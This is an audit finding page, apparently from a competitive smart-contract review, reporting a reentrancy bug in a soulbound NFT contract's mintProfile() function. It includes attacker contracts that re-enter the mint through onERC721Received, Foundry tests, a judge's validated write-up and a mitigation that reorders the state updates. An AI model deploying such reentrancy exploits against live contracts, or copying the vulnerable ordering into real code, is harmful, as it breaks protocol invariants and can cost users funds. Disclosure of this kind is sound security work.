DatingDapp

AI First Flight #6
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: medium
Valid

Reentrancy in mintProfile() allows attacker to mint multiple profiles in a single transaction

Root + Impact

Description

  • The mintProfile() function mints a soulbound NFT profile for a user. The function calls _safeMint() before updating the contract's internal state.

  • However, _safeMint() triggers an external call to onERC721Received() when the recipient is a contract. This allows a malicious contract to reenter mintProfile() before the state variables profileToToken and _profiles are updated.

  • Because the check require(profileToToken[msg.sender] == 0) is evaluated before the state update, the reentrant call can bypass this check and mint multiple profiles in a single transaction.


// The contract performs an external call via _safeMint() before updating its state.
function mintProfile(string memory name, uint8 age, string memory profileImage) external {
require(profileToToken[msg.sender] == 0, "Profile already exists");
uint256 tokenId = ++_nextTokenId;
_safeMint(msg.sender, tokenId); // external call via onERC721Received
// misses CEI
_profiles[tokenId] = Profile(name, age, profileImage);
profileToToken[msg.sender] = tokenId;
}
// The external call enables the attacker contract to execute onERC721Received() and call mintProfile() again before the mapping is updated.

Risk

Likelihood:

  • _safeMint() triggers onERC721Received() when the receiver is a contract.

  • A malicious contract implementing IERC721Receiver can call mintProfile() again during this callback.

  • The state variable profileToToken[msg.sender] has not yet been updated, allowing the require check to pass again.

Impact:

  • An attacker can mint multiple profile NFTs in a single transaction.

  • The invariant that each address can only own one profile is violated.

  • This can lead to inconsistent protocol state and multiple identities tied to a single user.

Proof of Concept

contract ReentrancyAttacker is IERC721Receiver {
SoulboundProfileNFT public target;
bool internal hasReentered;
constructor(address _target) {
target = SoulboundProfileNFT(_target);
}
function attack() external {
target.mintProfile("attacker", 30, "ipfs://img");
}
function onERC721Received(
address,
address,
uint256,
bytes calldata
) external override returns (bytes4) {
if (!hasReentered) {
hasReentered = true;
target.mintProfile("attacker2", 31, "ipfs://img2");
}
return IERC721Receiver.onERC721Received.selector;
}
}

Foundry Test:

function testReentrancyMintProfile() public {
attacker.attack();
uint256 balance = nft.balanceOf(address(attacker));
assertEq(balance, 2);
}
// The attacker receives two profile NFTs in a single transaction, bypassing the intended restriction.

Recommended Mitigation

function mintProfile(string memory name, uint8 age, string memory profileImage) external {
require(profileToToken[msg.sender] == 0, "Profile already exists");
uint256 tokenId = ++_nextTokenId;
+ profileToToken[msg.sender] = tokenId;
+ _profiles[tokenId] = Profile(name, age, profileImage);
_safeMint(msg.sender, tokenId);
- _profiles[tokenId] = Profile(name, age, profileImage);
- profileToToken[msg.sender] = tokenId;
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[M-04] Reentrancy in `SoulboundProfileNft::mintProfile` allows minting multiple NFTs per address, which disrupts protocol expectations

## Description In `mintProfile`, the internal `_safeMint` function is called before updating the contract state (`_profiles[tokenId]` and `profileToToken[msg.sender]`). This violates CEI, as `_safeMint` calls an internal function that could invoke an external contract if `msg.sender` is a contract with a malicious `onERC721Received` implementation. Source Code: ```solidity function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ``` ## Vulnerability Details Copy this test and auxiliary contract in the unit test suite to prove that an attacker can mint multiple NFTs: ```solidity function testReentrancyMultipleNft() public { MaliciousContract maliciousContract = new MaliciousContract( address(soulboundNFT) ); vm.prank(address(maliciousContract)); MaliciousContract(maliciousContract).attack(); assertEq(soulboundNFT.balanceOf(address(maliciousContract)), 2); assertEq(soulboundNFT.profileToToken(address(maliciousContract)), 1); } ``` ```Solidity contract MaliciousContract { SoulboundProfileNFT soulboundNFT; uint256 counter; constructor(address _soulboundNFT) { soulboundNFT = SoulboundProfileNFT(_soulboundNFT); } // Malicious reentrancy attack function attack() external { soulboundNFT.mintProfile("Evil", 99, "malicious.png"); } // Malicious onERC721Received function function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4) { // Reenter the mintProfile function if (counter == 0) { counter++; soulboundNFT.mintProfile("EvilAgain", 100, "malicious2.png"); } return 0x150b7a02; } } ``` ## Impact The attacker could end up having multiple NTFs, but only one profile. This is because the `mintProfile`function resets the `profileToToken`mapping each time. At the end, the attacker will have only one profile connecting with one token ID with the information of the first mint. I consider that the severity is Low because the `LikeRegistry`contract works with the token IDs, not the NFTs. So, the impact will be a disruption in the relation of the amount of NTFs and the amount of profiles. ## Recommendations To follow CEI properly, move `_safeMint` to the end: ```diff function mintProfile(string memory name, uint8 age, string memory profileImage) external { require(profileToToken[msg.sender] == 0, "Profile already exists"); uint256 tokenId = ++_nextTokenId; - _safeMint(msg.sender, tokenId); // Store metadata on-chain _profiles[tokenId] = Profile(name, age, profileImage); profileToToken[msg.sender] = tokenId; + _safeMint(msg.sender, tokenId); emit ProfileMinted(msg.sender, tokenId, name, age, profileImage); } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!